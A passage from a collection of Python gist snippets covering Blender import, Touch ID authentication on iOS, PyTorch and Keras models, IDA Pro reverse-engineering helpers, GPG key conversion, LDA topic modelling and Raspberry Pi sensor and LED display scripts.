layout = self.layout
row = layout.row(align=True)
row.prop(self, "ngons_setting")
row.prop(self, "edges_setting")
layout.prop(self, "smooth_groups_setting")
box = layout.box()
row = box.row()
row.prop(self, "split_mode_setting", expand=True)
row = box.row()
if self.split_mode_setting == 'ON':
row.label(text="Split by:")
row.prop(self, "split_objects_setting")
row.prop(self, "split_groups_setting")
else:
row.prop(self, "groups_as_vgroups_setting")
row = layout.split(percentage=0.67)
row.prop(self, "clamp_size_setting")
layout.prop(self, "axis_forward_setting")
layout.prop(self, "axis_up_setting")
layout.prop(self, "image_search_setting")
row = layout.split(percentage=0.5)
row.prop(self, "scale_setting")
row.prop(self, "center_origin")
def execute(self, context):
# get the folder
folder = (os.path.dirname(self.filepath))
# iterate through the selected files
for j, i in enumerate(self.files):
# generate full path to file
path_to_file = (os.path.join(folder, i.name))
# call obj operator and assign ui values
bpy.ops.import_scene.obj(filepath = path_to_file,
axis_forward = self.axis_forward_setting,
axis_up = self.axis_up_setting,
use_edges = self.edges_setting,
use_smooth_groups = self.smooth_groups_setting,
use_split_objects = self.split_objects_setting,
use_split_groups = self.split_groups_setting,
use_groups_as_vgroups = self.groups_as_vgroups_setting,
use_image_search = self.image_search_setting,
split_mode = self.split_mode_setting,
global_clamp_size = self.clamp_size_setting)
if self.center_origin: bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
bpy.ops.transform.resize(value=(self.scale_setting,self.scale_setting,self.scale_setting), constraint_axis=(False, False, False))
bpy.ops.object.transform_apply(location=False, rotation=False, scale=True)
return {'FINISHED'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(ImportMultipleObjs.bl_idname, text="Wavefont Batch (.obj)")
def register():
bpy.utils.register_class(ImportMultipleObjs)
bpy.types.INFO_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(ImportMultipleObjs)
bpy.types.INFO_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
# test call
#bpy.ops.import_scene.multiple_objs('INVOKE_DEFAULT')
```
#### File: hard-gists/b0c075cfde406280cbf7/snippet.py
```python
from objc_util import *
ObjCClass('NSBundle').bundleWithPath_('/System/Library/Frameworks/LocalAuthentication.framework').load()
context = ObjCClass('LAContext').alloc().init()
policy = 1 #put 1 if you want to auth with password, 2 with passcode
reason = 'We need you fingerprint to ste...ehm... to log you in'
def funct(_cmd,success,error):
if success:
print 'Autenticated!'
else:
autherr= ObjCInstance(error).localizedDescription()
if str(autherr).startswith('Fallback'):
if console.input_alert('Password') == '<PASSWORD>':
print 'Authenticated!'
else:
print 'WRONG PSW'
if str(autherr).startswith('Application retry'):
print('Wrong Fingerprint!')
if str(autherr).startswith('Biometry'):
print('Too many wrong fingerprints!!')
else:
print autherr
handler=ObjCBlock(funct,restype=None,argtypes=[c_void_p,c_void_p,c_void_p])
context.evaluatePolicy_localizedReason_reply_(policy,reason,handler)
```
#### File: hard-gists/b27cdbff68870418bdb8cefa86a2d558/snippet.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
## load mnist dataset
root = './data'
download = False
trans = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
train_set = dset.MNIST(root=root, train=True, transform=trans, download=download)
test_set = dset.MNIST(root=root, train=False, transform=trans)
batch_size = 128
kwargs = {'num_workers': 1, 'pin_memory': True}
train_loader = torch.utils.data.DataLoader(
dataset=train_set,
batch_size=batch_size,
shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
dataset=test_set,
batch_size=batch_size,
shuffle=False, **kwargs)
print '==>>> total trainning batch number: {}'.format(len(train_loader))
print '==>>> total testing batch number: {}'.format(len(test_loader))
## network
class MLPNet(nn.Module):
def __init__(self):
super(MLPNet, self).__init__()
self.fc1 = nn.Linear(28*28, 500)
self.fc2 = nn.Linear(500, 256)
self.fc3 = nn.Linear(256, 10)
self.ceriation = nn.CrossEntropyLoss()
def forward(self, x, target):
x = x.view(-1, 28*28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
loss = self.ceriation(x, target)
return x, loss
def name(self):
return 'mlpnet'
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.Linear(4*4*50, 500)
self.fc2 = nn.Linear(500, 10)
self.ceriation = nn.CrossEntropyLoss()
def forward(self, x, target):
x = self.conv1(x)
x = F.max_pool2d(x, 2, 2)
x = F.relu(x)
x = self.conv2(x)
x = F.max_pool2d(x, 2, 2)
x = F.relu(x)
x = x.view(-1, 4*4*50)
x = self.fc1(x)
x = self.fc2(x)
loss = self.ceriation(x, target)
return x, loss
def name(self):
return 'lenet'
## training
model = MLPNet().cuda()
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
for epoch in xrange(10):
# trainning
for batch_idx, (x, target) in enumerate(train_loader):
optimizer.zero_grad()
x, target = Variable(x.cuda()), Variable(target.cuda())
_, loss = model(x, target)
loss.backward()
optimizer.step()
if batch_idx % 100 == 0:
print '==>>> epoch: {}, batch index: {}, train loss: {:.6f}'.format(epoch, batch_idx, loss.data[0])
# testing
correct_cnt, ave_loss = 0, 0
for batch_idx, (x, target) in enumerate(test_loader):
x, target = Variable(x.cuda(), volatile=True), Variable(target.cuda(), volatile=True)
score, loss = model(x, target)
_, pred_label = torch.max(score.data, 1)
correct_cnt += (pred_label == target.data).sum()
ave_loss += loss.data[0]
accuracy = correct_cnt*1.0/len(test_loader)/batch_size
ave_loss /= len(test_loader)
print '==>>> epoch: {}, test loss: {:.6f}, accuracy: {:.4f}'.format(epoch, ave_loss, accuracy)
torch.save(model.state_dict(), model.name())
```
#### File: hard-gists/b3143dde185cecda7c1dee7ffbce5d2c/snippet.py
```python
__VERSION__ = '0.1'
__AUTHOR__ = '@herrcore'
PLUGIN_NAME = "Quick IOCTL Decoder"
PLUGIN_HOTKEY = 'Ctrl-Alt-I'
import idaapi
class IOCTL_Decoder():
DEVICE = [None]*55
DEVICE[1]="BEEP"
DEVICE[2]="CD_ROM"
DEVICE[3]="CD_ROM_FILE_SYSTEM"
DEVICE[4]="CONTROLLER"
DEVICE[5]="DATALINK"
DEVICE[6]="DFS"
DEVICE[7]="DISK"
DEVICE[8]="DISK_FILE_SYSTEM"
DEVICE[9]="FILE_SYSTEM"
DEVICE[10]="INPORT_PORT"
DEVICE[11]="KEYBOARD"
DEVICE[12]="MAILSLOT"
DEVICE[13]="MIDI_IN"
DEVICE[14]="MIDI_OUT"
DEVICE[15]="MOUSE"
DEVICE[16]="MULTI_UNC_PROVIDER"
DEVICE[17]="NAMED_PIPE"
DEVICE[18]="NETWORK"
DEVICE[19]="NETWORK_BROWSER"
DEVICE[20]="NETWORK_FILE_SYSTEM"
DEVICE[21]="NULL"
DEVICE[22]="PARALLEL_PORT"
DEVICE[23]="PHYSICAL_NETCARD"
DEVICE[24]="PRINTER"
DEVICE[25]="SCANNER"
DEVICE[26]="SERIAL_MOUSE_PORT"
DEVICE[27]="SERIAL_PORT"
DEVICE[28]="SCREEN"
DEVICE[29]="SOUND"
DEVICE[30]="STREAMS"
DEVICE[31]="TAPE"
DEVICE[32]="TAPE_FILE_SYSTEM"
DEVICE[33]="TRANSPORT"
DEVICE[34]="UNKNOWN"
DEVICE[35]="VIDEO"
DEVICE[36]="VIRTUAL_DISK"
DEVICE[37]="WAVE_IN"
DEVICE[38]="WAVE_OUT"
DEVICE[39]="8042_PORT"
DEVICE[40]="NETWORK_REDIRECTOR"
DEVICE[41]="BATTERY"
DEVICE[42]="BUS_EXTENDER"
DEVICE[43]="MODEM"
DEVICE[44]="VDM"
DEVICE[45]="MASS_STORAGE"
DEVICE[46]="SMB"
DEVICE[47]="KS"
DEVICE[48]="CHANGER"
DEVICE[49]="SMARTCARD"
DEVICE[50]="ACPI"
DEVICE[51]="DVD"
DEVICE[52]="FULLSCREEN_VIDEO"
DEVICE[53]="DFS_FILE_SYSTEM"
DEVICE[54]="DFS_VOLUME"
def __init__(self, control_code):
self.control_code = control_code
def decode(self):
out={}
device_val = (self.control_code >> 16) & 0xFFF
funcVal = (self.control_code >> 2) & 0xFFF
if (device_val <= 54) and (device_val != 0):
device_string = self.DEVICE[device_val]+ " ("+hex(device_val)+")"
else:
device_string = hex(device_val)
function_string = hex(funcVal)
out["device"] = device_string
out["function"] = function_string
access = (self.control_code >> 14) & 3
method = self.control_code & 3
access_string = ""
if access == 0:
access_string = "FILE_ANY_ACCESS"
elif access == 1:
access_string = "FILE_READ_ACCESS"
elif access == 2:
access_string = "FILE_WRITE_ACCESS"
elif access == 3:
access_string = "Read and Write"
method_string = ""
if method == 0:
method_string = "METHOD_BUFFERED"
elif method == 1:
method_string = "METHOD_IN_DIRECT"
elif method == 2:
method_string = "METHOD_OUT_DIRECT"
elif method == 3:
method_string = "METHOD_NEITHER"
out["access"] = access_string
out["method"] = method_string
return out
class IDAIOCTLDecoder():
@staticmethod
def decode():
ea = ScreenEA()
if ea == idaapi.BADADDR:
idaapi.msg(PLUGIN_NAME + " ERROR: Could not get get_screen_ea()")
return
str_id = idaapi.get_highlighted_identifier()
if not str_id:
idaapi.msg(PLUGIN_NAME + " ERROR: No Ioctl Code highlighted!")
return
try:
if str_id[-1] == 'h':
code = int(str_id[:-1], 16)
elif str_id[-1] == 'o':
code = int(str_id[:-1], 8)
elif str_id[-1] == 'b':
code = int(str_id[:-1], 2)
else:
code = int(str_id)
except ValueError:
idaapi.msg(PLUGIN_NAME + " ERROR: Not a valid Ioctl Code: " + str(str_id))
return
try:
decoder = IOCTL_Decoder(code)
ioctl_data = decoder.decode()
#print decoded IOCTL to cli
msg_string = "That IOCTL decodes to: \n\tDevice: %s \n\tFunction: %s \n\tAccess: %s \n\tMethod: %s"
idaapi.msg(msg_string % (ioctl_data["device"], ioctl_data["function"], ioctl_data["access"], ioctl_data["method"]))
#add decoded IOCTL as comment
comment_string = "dwIoControlCode: \n\t\tDevice: %s \n\t\tFunction: %s \n\t\tAccess: %s \n\t\tMethod: %s"
idaapi.set_cmt(ea, comment_string % (ioctl_data["device"], ioctl_data["function"], ioctl_data["access"], ioctl_data["method"]), 0)
except Exception as e:
idaapi.msg(PLUGIN_NAME + " ERROR: " + str(e))
return
class IOCTLDecodeHandler(idaapi.action_handler_t):
def activate(self, ctx):
IDAIOCTLDecoder.decode()
def update(self, ctx):
return idaapi.AST_ENABLE_ALWAYS
class QuickIOCTLDecoderHooks(idaapi.UI_Hooks):
def finish_populating_tform_popup(self, form, popup):
tft = idaapi.get_tform_type(form)
if tft == idaapi.BWN_DISASM:
# Note the 'None' as action name (1st parameter).
# That's because the action will be deleted immediately
# after the context menu is hidden anyway, so there's
# really no need giving it a valid ID.
desc = idaapi.action_desc_t(None, 'Decode IOCTL', IOCTLDecodeHandler())
idaapi.attach_dynamic_action_to_popup(form, popup, desc, None)
class QuickIOCTLDecoder(idaapi.plugin_t):
flags = idaapi.PLUGIN_UNL
comment = "Decode IOCTL codes!"
help = "Highlight IOCTL and right-click 'Decode IOCTL'"
wanted_name = PLUGIN_NAME
wanted_hotkey = PLUGIN_HOTKEY
def init(self):
idaapi.msg("Initializing: %s\n" % PLUGIN_NAME)
global hooks
hooks = QuickIOCTLDecoderHooks()
re = hooks.hook()
return idaapi.PLUGIN_OK
def run(self, arg):
IDAIOCTLDecoder.decode()
pass
def term(self):
pass
def PLUGIN_ENTRY():
return QuickIOCTLDecoder()
```
#### File: hard-gists/b45983f227f1e4fbea65b6e06abfdecc/snippet.py
```python
from keras.engine.topology import Layer
from keras import initializations
from keras import backend as K
class Attention(Layer):
'''Attention operation for temporal data.
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
'''
def __init__(self, attention_dim, **kwargs):
self.init = initializations.get('glorot_uniform')
self.attention_dim = attention_dim
super(Attention, self).__init__(**kwargs)
def build(self, input_shape):
self.W = self.init((self.attention_dim, self.attention_dim),
name='{}_W'.format(self.name))
self.b = K.zeros((self.attention_dim,), name='{}_b'.format(self.name))
self.u = self.init((self.attention_dim,), name='{}_u'.format(self.name))
self.trainable_weights += [self.W, self.b, self.u]
self.built = True
def get_output_shape_for(self, input_shape):
return (input_shape[0], input_shape[2])
def call(self, x, mask=None):
# Calculate the first hidden activations
a1 = K.tanh(K.dot(x, self.W) + self.b) # [n_samples, n_steps, n_hidden]
# K.dot won't let us dot a 3D with a 1D so we do it with mult + sum
mul_a1_u = a1 * self.u # [n_samples, n_steps, n_hidden]
dot_a1_u = K.sum(mul_a1_u, axis=2) # [n_samples, n_steps]
# Calculate the per step attention weights
a2 = K.softmax(dot_a1_u)
a2 = K.expand_dims(a2) # [n_samples, n_steps, 1] so div broadcasts
# Apply attention weights to steps
weighted_input = x * a2 # [n_samples, n_steps, n_features]
# Sum across the weighted steps to get the pooled activations
return K.sum(weighted_input, axis=1)
```
#### File: hard-gists/b493a228c4081ff0260b/snippet.py
```python
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
import requests
import urlparse
def save_image_from_url(field, url):
r = requests.get(url)
if r.status_code == requests.codes.ok:
img_temp = NamedTemporaryFile(delete = True)
img_temp.write(r.content)
img_temp.flush()
img_filename = urlparse.urlsplit(url).path[1:]
field.save(img_filename, File(img_temp), save = True)
return True
return False
```
#### File: hard-gists/b6e374d172bbe3e6130f6849e7bd6c13/snippet.py
```python
import nltk
import pandas as pd
import re
import pprint
import operator
import csv
import logging
from stop_words import get_stop_words
from collections import defaultdict
from gensim import corpora
from gensim.models import ldamodel
from nltk.stem import WordNetLemmatizer
# constants
STOPWORDS = set(get_stop_words('en'))
CUSTOM_STOPWORDS = {'light', 'lights', 'lights', 'sky', 'object', 'bright', 'ufo', 'quot'}
pp = pprint.PrettyPrinter(indent=4)
regex_filter = re.compile('[a-z]{2,}')
# put your custom path here if you so choose
nltk.data.path.append('')
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def tokenize_and_clean(document, stopwords=(), regex=[], lemmatizer=WordNetLemmatizer()):
"""
:param document: a string representing a single document
:param stopwords: a set of stopwords
:param regex: additional regular expressions to use as a filter. Assuming these are compiled prior
:param lemmatizer: an instance of an nltk lemmatizer
:return: a tokenized and filtered document
"""
raw_tokenized = nltk.tokenize.wordpunct_tokenize(document)
tokenized = []
for word in raw_tokenized:
w = word.lower()
if w not in stopwords:
for exp in regex:
if re.match(exp,w):
if lemmatizer:
tokenized.append(lemmatizer.lemmatize(w))
else:
tokenized.append(w)
return tokenized
def word_frequency(corpus=[[]]):
"""
:param corpus: a list of lists representing tokenized documents
:return: a dict containing the frequency of each word in the corpus
"""
frequency = defaultdict(int)
for doc in corpus:
for w in doc:
frequency[w] += 1
return dict(sorted(frequency.items(), key=operator.itemgetter(1), reverse=True))
def write_dict_to_csv(data, filepath):
"""
Encapsulating this in a function - writes an object to a csv
:param data: a dict containing your data
:param filepath: the filepath for your csv file
"""
with open(filepath, 'wb') as csv_file:
writer = csv.writer(csv_file)
for key, value in data:
writer.writerow([key, value])
# reading in the raw file - there are other interesting data that we won't analyze at this time
raw = pd.read_csv('./data/raw.csv', usecols=[7], names=['description'])
# a dict for our document corpus
corpus = []
for i, row in raw.iterrows():
corpus.append(row[0])
tokenized_corpus = []
for doc in corpus:
try:
tokenized_corpus.append(tokenize_and_clean(document=doc, stopwords=STOPWORDS.union(CUSTOM_STOPWORDS), regex=[regex_filter]))
except:
pass
freq = word_frequency(tokenized_corpus)
# filtering words based off of low frequency < 10 instances (mispellings, rare words) and removing
# high frequency words that don't provide a lot of discrimination between documents
tokenized_final = [[token for token in doc if freq[token] > 10] for doc in tokenized_corpus]
# creating a vocabulary of words from this corpus for streaming use
vocabulary = corpora.Dictionary(tokenized_final)
# save to disk
vocabulary.save('data/vocabulary.dict')
print(vocabulary)
# creating an mm corpus
corpus = [vocabulary.doc2bow(text) for text in tokenized_final]
corpora.MmCorpus.serialize('data/ufo.mm', corpus)
ufo_corpus = corpora.MmCorpus('data/ufo.mm')
lda = ldamodel.LdaModel(corpus=ufo_corpus,alpha='auto', id2word=vocabulary, num_topics=20, update_every=0, passes=20)
with open('data/lda_topics', 'w') as file:
file.write(str(lda.print_topics(-1)))
lda.print_topics(-1)
```
#### File: hard-gists/b76261844db0255899ba857838a7c201/snippet.py
```python
from objc_util import ObjCClass, on_main_thread
UIDebuggingInformationOverlay = ObjCClass('UIDebuggingInformationOverlay')
@on_main_thread
def toggle_overlay():
UIDebuggingInformationOverlay.prepareDebuggingOverlay()
UIDebuggingInformationOverlay.overlay().toggleVisibility()
toggle_overlay()
```
#### File: hard-gists/b9df49cfc1540bc8b896/snippet.py
```python
from pgp.packets import constants
from pgp.packets import parsers
from Crypto.PublicKey import RSA
import sys
"""
Converts an GnuPG key to a PEM key
If the input is password protected, the same password will be used to protect
the PEM output.
"""
def convert(keyid, passphrase, infh, outfh):
packets = parsers.parse_binary_packet_stream(infh)
for packet in packets:
if packet.type == constants.SECRET_KEY_PACKET_TYPE or packet.type == constants.SECRET_SUBKEY_PACKET_TYPE:
print('found key id', packet.key_id)
if packet.key_id != keyid:
continue
if passphrase is not None:
print('decrypting key', packet.key_id)
packet.decrypt(passphrase)
print('creating PEM')
rsa = RSA.construct((packet.modulus, packet.exponent, packet.exponent_d, packet.prime_p, packet.prime_q, packet.multiplicative_inverse_u))
pem = rsa.exportKey('PEM', passphrase, 1)
outfh.write(pem)
return
elif packet.type == constants.PUBLIC_KEY_PACKET_TYPE or packet.type == constants.PUBLIC_SUBKEY_PACKET_TYPE:
print('found public key id', packet.key_id)
if packet.key_id != keyid:
continue
print('creating PEM')
rsa = RSA.construct((packet.modulus, packet.exponent))
pem = rsa.exportKey('PEM')
outfh.write(pem)
return
print('key not found')
def main(argv):
if (len(argv) < 3):
print('usage: gpg_to_pem.py keyid input.gpg output.pem [passphrase]')
return
with open(argv[1], 'rb') as infh:
with open(argv[2], 'wb') as outfh:
passphrase = bytes(argv[3], 'ascii') if len(argv) > 3 else None
convert(argv[0].upper(), passphrase, infh, outfh)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: hard-gists/badd18a84b236c9e6c34057512cb569a/snippet.py
```python
import unicornhat as unicorn
from random import randint
import time, math, colorsys
import os, sys, subprocess, threading
# Initialization
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.35) # Tune to your preferences.
width,height=unicorn.get_shape()
# Line number for where each function will begin
function_pos = {}
# Store values for multithreaded fetching functions.
function_values = {}
def main(display_function, bar_functions, time_limit=None):
""" The main display function. Uses function_pos to assign parts of the display to
bar functions and display functions.
Args:
display_function (func): A function intended to take up the majority of the HAT's
display. Should limit display area with the use of function_pos.
bar_functions (func): A list of single-row "bars". Again, assign position with the
use of function_pos.
time_limit (int): How long to wait before quitting (in seconds).
"""
if bar_functions is not None:
for index, bar_function in enumerate(bar_functions):
function_pos[bar_function] = width - index - 1
if display_function is not None:
function_pos[display_function] = width - len(bar_functions) - 1
else:
function_pos[display_function] = width - 1
threads = [threading.Thread(target=function) for function in function_pos.keys()]
for thread in threads:
thread.start()
if time_limit is not None:
time.sleep(time_limit)
print("Time limit reached!")
os._exit(3)
######################################################################
####################### ##########################
####################### BAR FUNCTIONS ##########################
####################### ##########################
######################################################################
####################### INTERNET BAR ##########################
def internet_color(update_rate=5):
""" Color bar - tests internet connectivity. Displays white if connected;
orange if not.
Args:
update_rate (float): seconds to wait before checking connectivity again
"""
# Ping a Google DNS server to check for internet connectivity.
while True:
ping_response = subprocess.Popen(["/bin/ping", "-c1", "-w100", "8.8.8.8"], stdout=subprocess.PIPE).stdout.read()
if "1 received" in str(ping_response):
moving_pixel(function_pos[internet_color], (0, 255, 255), (255, 255, 255))
else:
moving_pixel(function_pos[internet_color], (255, 255, 255), (255, 127, 80))
unicorn.show()
time.sleep(update_rate)
def color_bar(position, color):
""" Display a single, static bar of ```color``` in ```position```.
Args:
position (int): the width index at which to display the bar
color (int tuple): (R, G, B) tuple of the RGB color to be displayed
"""
for height_index in range(height):
unicorn.set_pixel(position, height_index, *color)
return
def moving_pixel(position, color, background, speed=0.1, direction="right"):
""" Display a right-moving pixel of color ```color``` on a color bar with
color ```background``` in position ```position.```
Args:
position (int): The width index at which to display the bar animation
color (int tuple): (R, G, B) tuple of the moving pixel's color
background (int tuple): (R, G, B) tuple of the background color
speed (float): how often to wait between pixel movements
direction (string, "left" or "right"): the direction the pixel
should move, with "right" being towards the USB ports
"""
for height_index in range(height):
color_bar(position, background)
if direction == "right":
unicorn.set_pixel(position, height_index, *color)
if direction == "left":
unicorn.set_pixel(position, height - height_index - 1, *color)
unicorn.show()
time.sleep(speed)
color_bar(position, background)
unicorn.show()
######################################################################
####################### ##########################
####################### FETCHER FUNCTIONS ##########################
####################### ##########################
######################################################################
def load_fetcher(update_rate=5):
""" Get the load of the system and modify the relevant dictionary
with the new load value.
Args:
update_rate (float): seconds to wait before fetching load value
"""
while True:
function_values[load_fetcher] = os.getloadavg()[0]
time.sleep(update_rate)
def random_color():
""" Generate a random RGB color.
Returns:
int tuple: (R, G, B) values
"""
r, g, b = randint(0, 255), randint(0, 255), randint(0, 255)
return (r, g, b)
######################################################################
####################### ##########################
####################### DISPLAY FUNCTIONS ##########################
####################### ##########################
######################################################################
####################### LOAD SPARKLES ##########################
def load_sparkles(color_function=None, update_rate=5):
""" Fill the rest of the area with randomly-positioned sparkles.
Frequency of sparkling increases with load^2 (for load>1).
Args:
color_function (func): Define a custom function for the
sparkles' color, instead of a random rainbow.
update_rate (float): How often to refresh system load value (seconds).
"""
color_function = random_color if color_function is None else color_function
def random_pixel(color_function):
""" Generate a randomly positioned pixel with the color returned
by color_function.
Args:
color_function (func): Should return a (R,G,B) color value.
"""
color = color_function()
def random_position():
""" Get the position of a random pixel bound by
function_pos. """
x = randint(0, function_pos[load_sparkles])
y = randint(0, (height-1))
return (x,y)
selected_pixel = random_position()
''' Aesthetic: If the randomly generated pixel is currently lit,
turn it off and try with a new pixel. Also works as sort of a
population control on how many pixels will be lit. '''
while sum(unicorn.get_pixel(*selected_pixel)) > 0:
unicorn.set_pixel(*(selected_pixel + (0, 0, 0)))
selected_pixel = random_position()
unicorn.set_pixel(*(selected_pixel + color))
return
''' Sparkle with a frequency based off of the computer's current
load. Fetch load value every update_rate seconds.'''
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
while True:
tick = 1
if function_values[load_fetcher] > 1:
tick = 1/(function_values[load_fetcher]**2) if function_values[load_fetcher] < 12 else 1/144
for i in range(int(update_rate/tick)):
random_pixel(color_function)
unicorn.show()
time.sleep(tick)
####################### LOAD RAINBOW ##########################
def load_rainbow(update_rate=5):
""" A lightly modified version of Pimeroni's "rainbow" example.
Displays a moving rainbow of colors that increases with load.
Args:
update_rate (float): How often to update the load value (seconds).
"""
i = 0.0
offset = 30
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
while True:
load_function = function_values[load_fetcher]/10 if function_values[load_fetcher] <= 10 else 10
for w in range(int(update_rate/0.01)):
i = i + load_function
for y in range(height):
for x in range(function_pos[load_rainbow] + 1):
r = 0#x * 32
g = 0#y * 32
xy = x + y / 4
r = (math.cos((x+i)/2.0) + math.cos((y+i)/2.0)) * 64.0 + 128.0
g = (math.sin((x+i)/1.5) + math.sin((y+i)/2.0)) * 64.0 + 128.0
b = (math.sin((x+i)/2.0) + math.cos((y+i)/1.5)) * 64.0 + 128.0
r = max(0, min(255, r + offset))
g = max(0, min(255, g + offset))
b = max(0, min(255, b + offset))
unicorn.set_pixel(x,y,int(r),int(g),int(b))
unicorn.show()
time.sleep(0.01)
####################### LOAD MATRIX ##########################
def load_matrix(update_rate=5):
""" A heavily modified version of Pimeroni's "cross" example.
Speed increases with n*load^2.
Args:
update_rate (float): seconds to wait before updating load value
"""
points = []
edge_pixels = []
class LightPoint:
def __init__(self):
self.direction = randint(1, 4)
if self.direction == 1:
self.x = randint(0, function_pos[load_matrix])
self.y = 0
elif self.direction == 2:
self.x = 0
self.y = randint(0, height - 1)
elif self.direction == 3:
self.x = randint(0, function_pos[load_matrix])
self.y = height - 1
else:
self.x = function_pos[load_matrix] - 1
self.y = randint(0, height - 1)
self.colour = []
for i in range(0, 3):
self.colour.append(randint(100, 255))
self.oldxy = (self.x, self.y)
def update_positions():
for point in points:
# Any point already at an edge has been in display at this
# edge for ```tick``` seconds already, so we delete it.
check_edges(point)
point.oldxy = (point.x, point.y)
if point.direction == 1:
point.y += 1
elif point.direction == 2:
point.x += 1
elif point.direction == 3:
point.y -= 1
else:
point.x -= 1
# Delete points that would cause a boundary violation after
# the above coordinate update.
check_boundaries(point)
unicorn.show()
def plot_points():
for point in points:
unicorn.set_pixel(point.x, point.y, point.colour[0], point.colour[1], point.colour[2])
unicorn.set_pixel(*(point.oldxy + (0, 0, 0)))
unicorn.show()
def check_edges(point):
""" Deletes points that have reached an edge.
Args:
point (LightPoint): The point that has reached an edge.
"""
if (point.x == function_pos[load_matrix] and point.direction is 2) \
or (point.x == 0 and point.direction is 4) \
or (point.y == 0 and point.direction is 3) \
or (point.y == height - 1 and point.direction is 1):
unicorn.set_pixel(point.x, point.y, 0, 0, 0)
points.remove(point)
def check_boundaries(point):
""" Deletes points beyond allowed boundaries.
Args:
point (LightPoint): The point to check for boundary violations.
"""
if (point.x > function_pos[load_matrix] and point.direction is 2) \
or (point.x < 0 and point.direction is 4) \
or (point.y < 0 and point.direction is 3) \
or (point.y > height - 1 and point.direction is 1):
if point in points:
points.remove(point)
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
tick_func = lambda load: 0.5/(load**2) if load > 1 else 1/4
max_points = function_pos[load_matrix]*height/3
while True:
tick = tick_func(function_values[load_fetcher]) if function_values[load_fetcher] < 12 else tick_func(12)
for w in range(int(update_rate/tick)):
if len(points) < max_points and randint(0, 5) > 1:
points.append(LightPoint())
update_positions()
plot_points()
time.sleep(tick)
if __name__ == "__main__":
main(load_matrix, (internet_color,))
```
#### File: hard-gists/bce94f1c37215f644e0c/snippet.py
```python
from idaapi import *
def extract_reg(line, cx):
linelen = len(line)
if cx >= linelen:
return
walker_cx = 0
byte_idx = 0
last_reg_start_idx = None
while walker_cx <= cx and byte_idx < linelen:
cur = line[byte_idx]
# print "byte_idx=%d, walker_cx=%d, cur=%d (%s)" % (byte_idx, walker_cx, ord(cur), "N/A" if ord(cur) < 32 or ord(cur) > 122 else cur)
if cur == COLOR_ON:
if ord(line[byte_idx + 1]) == COLOR_REG:
last_reg_start_idx = byte_idx + 2
byte_idx += 2
elif cur == COLOR_OFF:
if ord(line[byte_idx + 1]) == COLOR_REG:
last_reg_start_idx = None
byte_idx += 2
else:
byte_idx += 1
walker_cx += 1
if last_reg_start_idx:
last_reg_end_idx = last_reg_start_idx
while line[last_reg_end_idx] != COLOR_OFF and last_reg_end_idx < linelen:
last_reg_end_idx += 1
return line[last_reg_start_idx:last_reg_end_idx]
class MyWrapper(IDAViewWrapper):
def __init__(self, title):
IDAViewWrapper.__init__(self, title)
def OnViewClick(self, px, py, state):
widget = pycim_get_tcustom_control(self)
from_mouse = False
# get current line
line = get_custom_viewer_curline(widget, from_mouse)
# get current X, Y in rows&columns space (as opposed to pixel space)
_, cx, cy = get_custom_viewer_place(widget, from_mouse)
reg = extract_reg(line, cx)
if reg:
print "Register: '%s'" % reg
W = MyWrapper("IDA View-A")
if not W.Bind():
print "Binding failed!"
```
#### File: hard-gists/bce98c5c1688fc833475/snippet.py
```python
import argparse
from datetime import datetime
import logging
import signal
import sys
from threading import Timer
from time import time
from onewire import Onewire
from influxdb import client as influxdb
def int_signal_handler(signal, frame):
logging.info("interrupt detected")
sys.exit(0)
signal.signal(signal.SIGINT, int_signal_handler)
class ServiceLocation(object):
def __init__(self, hostname, port=None):
self.hostname = hostname
self.port = port
class ServiceLocationAction(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs is not None and nargs != 1:
raise ValueError("Only one argument is allowed for a service location.")
super(ServiceLocationAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if ":" in values:
hostname, port = values.split(":", 1)
port = int(port)
setattr(namespace, self.dest, ServiceLocation(hostname, port))
else:
hostname = values
setattr(namespace, self.dest, ServiceLocation(hostname))
class InfluxDatabaseWriter(object):
def __init__(self, location, name):
self._client = influxdb.InfluxDBClient(location.hostname, location.port)
self._client.switch_database(name)
def write(self, datum):
self._client.write_points([{
"measurement": datum.measurement,
"tags": {},
"time": datum.time.isoformat(),
"fields": {"value": datum.value}}])
class OneWireTemperatureSensor(object):
def __init__(self, location, identifier):
ow = Onewire("{hostname:s}:{port:d}".format(
hostname=location.hostname, port=location.port))
self._sensor = ow.sensor(identifier)
@property
def type(self):
return self._sensor.sensor_type
@property
def identifier(self):
return self._sensor.path
@property
def temperature(self):
temperature = self._sensor.read("temperature")
if temperature:
return float(temperature)
else:
return None
class TimeSeriesDatum(object):
def __init__(self, measurement, value):
self.time = datetime.utcnow()
self.measurement = measurement
self.value = value
class Repeater(object):
def __init__(self, interval, function, *args):
self._interval = interval
self._function = function
self._arguments = args
def __call__(self):
self._start_timer()
self._call_function()
def _call_function(self):
self._function(*self._arguments)
def _start_timer(self):
# align the execution of the function with the next multiple of
# the delay interval from the original start time
interval = self._interval
start_seconds = self._start_seconds
delay_seconds = interval - ((time() - start_seconds) % interval)
Timer(delay_seconds, self).start()
def start(self):
self._start_seconds = time()
self._start_timer()
